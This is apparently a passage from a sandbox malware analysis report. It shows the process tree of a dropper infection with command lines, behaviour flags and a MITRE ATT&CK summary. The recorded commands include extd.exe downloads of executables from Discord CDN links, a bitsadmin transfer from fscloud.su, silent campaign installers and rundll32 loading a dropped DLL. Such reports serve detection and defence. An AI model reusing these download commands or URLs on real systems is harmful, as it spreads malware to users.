                  Command line: C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffc9cb2dec0,0x7ffc9cb2ded0,0x7ffc9cb2dee0
                  - Checks BIOS information in registry
                  - Checks whether UAC is enabled
                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                    Command line: C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x158,0x15c,0x160,0x134,0x164,0x7ff7b6979e70,0x7ff7b6979e80,0x7ff7b6979e90
                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                  Command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1764,4329137705519038288,10573143780041811623,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw132_140769999" --mojo-platform-channel-handle=1776 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 584 -ip 584
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 852 -ip 852
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1416 -ip 1416
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\31AD.bat "C:\Users\Admin\Pictures\Adobe Films\JgYRm3l3lVYIu3OxbT9SrtZC.exe""
  C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
    - Suspicious use of SetWindowsHookEx
  C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/899625782291361795/899625800544964668/18.exe" "18.exe" "" "" "" "" "" ""
  C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/899625782291361795/899625964001193984/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
  C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe "" "" "" "" "" "" "" "" ""
    - Suspicious use of SetWindowsHookEx
  C:\Users\Admin\AppData\Local\Temp\21799\Transmissibility.exe
    Command line: Transmissibility.exe
  C:\Users\Admin\AppData\Local\Temp\21799\18.exe
    Command line: 18.exe
C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL
    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 456
      - Program crash
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4516 -ip 4516
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\WerFault.exe
  Command line: C:\Windows\system32\WerFault.exe -pss -s 404 -p 5232 -ip 5232
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1248 -ip 1248
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2672 -ip 2672
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3056 -ip 3056
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1452 -ip 1452
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5856 -ip 5856
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5492 -ip 5492
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 5688 -ip 5688
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5204 -ip 5204
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2964 -ip 2964
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\wbem\WMIADAP.EXE
  Command line: wmiadap.exe /F /T /R
  - Suspicious use of SetWindowsHookEx
C:\Windows\system32\wbem\wmiprvse.exe
  Command line: C:\Windows\system32\wbem\wmiprvse.exe -Embedding
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
C:\Users\Admin\AppData\Local\Temp\is-RVMGH.tmp\pXqJ9z4kMcKRrHcFa0zq6bMh.tmp
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-RVMGH.tmp\pXqJ9z4kMcKRrHcFa0zq6bMh.tmp" /SL5="$3031E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\pXqJ9z4kMcKRrHcFa0zq6bMh.exe"
  - Loads dropped DLL
  C:\Users\Admin\AppData\Local\Temp\is-CE4L7.tmp\ShareFolder.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-CE4L7.tmp\ShareFolder.exe" /S /UID=2709
    - Drops file in Drivers directory
    C:\Users\Admin\AppData\Local\Temp\47-1a9db-5d6-79db1-6904501d70c61\SHexalyshilo.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\47-1a9db-5d6-79db1-6904501d70c61\SHexalyshilo.exe"
      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3vk1ii5t.cn0\Calculator.exe & exit
        C:\Users\Admin\AppData\Local\Temp\3vk1ii5t.cn0\Calculator.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\3vk1ii5t.cn0\Calculator.exe
          C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
            Command line: C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
            C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
              Command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--EpsUK1"
              C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                Command line: C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ffc9cb2dec0,0x7ffc9cb2ded0,0x7ffc9cb2dee0
                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                  Command line: C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1d0,0x1d4,0x1d8,0x1ac,0x1dc,0x7ff7b6979e70,0x7ff7b6979e80,0x7ff7b6979e90
              C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                Command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,13431303747690812435,3682714545647626427,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5572_2125029425" --mojo-platform-channel-handle=1956 /prefetch:8
              C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                Command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1608,13431303747690812435,3682714545647626427,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5572_2125029425" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:2
      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\empxo2ql.r3t\GcleanerEU.exe /eufive & exit
        C:\Users\Admin\AppData\Local\Temp\empxo2ql.r3t\GcleanerEU.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\empxo2ql.r3t\GcleanerEU.exe /eufive
          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 276
            - Program crash
            - Checks processor information in registry
            - Enumerates system info in registry
      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\installer.exe /qn CAMPAIGN="654" & exit
        - Blocklisted process makes network request
        - Checks BIOS information in registry
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Checks processor information in registry
        - Suspicious use of SetWindowsHookEx
        C:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\installer.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\installer.exe /qn CAMPAIGN="654"
          - Enumerates connected drives
          - Modifies system certificate store
          - Suspicious use of FindShellTrayWindow
          C:\Windows\SysWOW64\msiexec.exe
            Command line: "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634304480 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xtaxcijq.pi5\any.exe & exit
        C:\Users\Admin\AppData\Local\Temp\xtaxcijq.pi5\any.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\xtaxcijq.pi5\any.exe
      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ahs0x1ga.rs1\customer51.exe & exit
        - Blocklisted process makes network request
        - Suspicious use of SetWindowsHookEx
      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fd1mvish.2tu\gcleaner.exe /mixfive & exit
        C:\Users\Admin\AppData\Local\Temp\fd1mvish.2tu\gcleaner.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\fd1mvish.2tu\gcleaner.exe /mixfive
          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 236
            - Program crash
            - Checks processor information in registry
            - Enumerates system info in registry
      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwgu34pj.yer\autosubplayer.exe /S & exit
        - Blocklisted process makes network request
        C:\Users\Admin\AppData\Local\Temp\kwgu34pj.yer\autosubplayer.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\kwgu34pj.yer\autosubplayer.exe /S
          - Drops file in Program Files directory
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbE365.tmp\tempfile.ps1"
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbE365.tmp\tempfile.ps1"
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbE365.tmp\tempfile.ps1"
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbE365.tmp\tempfile.ps1"
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbE365.tmp\tempfile.ps1"
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbE365.tmp\tempfile.ps1"
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbE365.tmp\tempfile.ps1"
            - Checks for any installed AV software in registry
          C:\Windows\SysWOW64\bitsadmin.exe
            Command line: "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
            - Download via BitsAdmin
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7040 -ip 7040
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 3720 -ip 3720
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 3500 -ip 3500
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5500 -ip 5500
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5204 -ip 5204
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\System32\Conhost.exe
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - Suspicious use of SetWindowsHookEx
C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3308 -ip 3308
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Drops file in Windows directory
  C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 827069499487FCC93E548AF7826A2F46 C
  C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 629FB91E54AF2DEDB37F503CCEB0B40D C
  C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding A7AD835A75740AD688572532039CCB06
    - Blocklisted process makes network request
  C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe
    Command line: "C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"
    - Adds Run key to start application
    C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe
      Command line: "C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default
      - Adds Run key to start application
      C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
        Command line: "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--EpsUK1"
        - Suspicious use of FindShellTrayWindow
        C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
          Command line: C:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x7ffcb634dec0,0x7ffcb634ded0,0x7ffcb634dee0
        C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
          Command line: "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1568,14487437594729713125,13650801322781108960,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4376_1405058377" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1588 /prefetch:2
        C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
          Command line: "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1568,14487437594729713125,13650801322781108960,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4376_1405058377" --mojo-platform-channel-handle=1908 /prefetch:8
        C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
          Command line: "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1568,14487437594729713125,13650801322781108960,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4376_1405058377" --mojo-platform-channel-handle=2496 /prefetch:8
        C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
          Command line: "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,14487437594729713125,13650801322781108960,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4376_1405058377" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2572 /prefetch:1
        C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
          Command line: "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,14487437594729713125,13650801322781108960,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4376_1405058377" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2580 /prefetch:1
        C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
          Command line: "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1568,14487437594729713125,13650801322781108960,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4376_1405058377" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3308 /prefetch:2
          - Modifies registry class
        C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
          Command line: "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,14487437594729713125,13650801322781108960,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4376_1405058377" --mojo-platform-channel-handle=3368 /prefetch:8
        C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
          Command line: "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,14487437594729713125,13650801322781108960,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4376_1405058377" --mojo-platform-channel-handle=3664 /prefetch:8
        C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
          Command line: "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,14487437594729713125,13650801322781108960,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4376_1405058377" --mojo-platform-channel-handle=3676 /prefetch:8
        C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
          Command line: "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,14487437594729713125,13650801322781108960,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4376_1405058377" --mojo-platform-channel-handle=1656 /prefetch:8
        C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
          Command line: "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1568,14487437594729713125,13650801322781108960,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4376_1405058377" --mojo-platform-channel-handle=3736 /prefetch:8
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_BFA7.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites' -retry_count 10"
      - Blocklisted process makes network request
      - Adds Run key to start application
C:\Windows\system32\DllHost.exe
  Command line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  - Adds Run key to start application
C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 7136 -s 196
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 7136 -ip 7136
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6584 -ip 6584
C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 448
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2800 -ip 2800
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 5052 -ip 5052
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
  - Modifies data under HKEY_USERS
C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3000 -ip 3000
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3764 -ip 3764
  - Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (2)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
- BITS Jobs (1)
Defense Evasion
- Modify Registry (3)
- Disabling Security Tools (1)
